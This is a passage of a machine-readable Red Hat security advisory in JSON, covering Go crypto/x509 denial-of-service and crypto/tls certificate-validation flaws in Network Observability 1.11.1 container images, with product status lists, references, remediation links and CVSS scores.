"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
],
"known_not_affected": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "RHBZ#2418462",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418462"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://go.dev/cl/725920",
"url": "https://go.dev/cl/725920"
},
{
"category": "external",
"summary": "https://go.dev/issue/76445",
"url": "https://go.dev/issue/76445"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4",
"url": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4155",
"url": "https://pkg.go.dev/vuln/GO-2025-4155"
}
],
"release_date": "2025-12-02T18:54:10.166000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T07:50:38+00:00",
"details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is a moderate flaw because it only occurs under specific conditions, such as TLS session resumption with runtime changes to certificate authority settings. Exploitation is not straightforward and requires a controlled setup. The impact is limited to certificate validation within the same component and does not affect system availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le"
],
"known_not_affected": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T07:50:38+00:00",
"details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
